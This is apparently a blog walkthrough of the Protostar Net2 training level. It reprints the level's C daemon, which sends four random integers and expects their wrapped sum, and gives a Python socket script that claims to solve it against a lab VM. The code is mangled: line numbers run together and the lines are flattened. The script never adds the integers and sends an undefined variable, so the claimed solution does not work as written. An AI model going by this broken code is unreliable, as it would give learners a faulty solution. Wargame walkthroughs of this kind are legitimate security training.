# Binary Exploitation Protostar Net2 - Walkthrough

Posted by Suraj Singh on June 18, 2018 · 7 mins read
Hello Guys,

Today In This post, I am going to share with you my walkthrough experience of Exploit Exercise Protostar Net2 Level.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

#### Note: I want to highlight Few Points.

• I'm not the creator of protostar war game. I am just a player.
• Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
• Understand all previous levels before starting this one.
• Do some research on Assembly, C/C++ and Gdb
• Do Some Research About Heap overflow exploitation.
•  All Credit Related To Exploit Exercise War Games Goes To exploit-exercises.com.

So, Let's Start.

### Hint

`This code tests the ability to add up 4 unsigned 32-bit integers. Hint: Keep in mind that it wraps.This level is at /opt/protostar/bin/net2`

### Source Code

 ` 1 2 3 4 5 6 7 8 9101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354` `#include "../common/common.c"#define NAME "net2"#define UID 997#define GID 997#define PORT 2997void run(){ unsigned int quad[4]; int i; unsigned int result, wanted; result = 0; for(i = 0; i < 4; i++) { quad[i] = random(); result += quad[i]; if(write(0, &(quad[i]), sizeof(result)) != sizeof(result)) { errx(1, ":(\n"); } } if(read(0, &wanted, sizeof(result)) != sizeof(result)) { errx(1, ":<\n"); } if(result == wanted) { printf("you added them correctly\n"); } else { printf("sorry, try again. invalid\n"); }}int main(int argc, char **argv, char **envp){ int fd; char *username; /* Run the process as a daemon */ background_process(NAME, UID, GID); /* Wait for socket activity and return */ fd = serve_forever(PORT); /* Set the client socket to STDIN, STDOUT, and STDERR */ set_io(fd); /* Don't do this :> */ srandom(time(NULL)); run();}`

Super Easy!

### Exploit

 ` 1 2 3 4 5 6 7 8 9101112131415161718192021222324252627282930313233343536373839` `#!/usr/bin/pythonimport structimport socket# Connection Detailsport = 2997ip = '192.168.198.128'# Create Sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# Socket Bind s.connect((ip, port))for i in range(4): #print i+1 # Receive data = s. recv(4) print [data] #print bin(data) k="i" #print k print len(data) data = struct.unpack(k, data) print data # Sendings.send(str(num))# Check Resultprint s.recv(2048)# Close Ports.close()`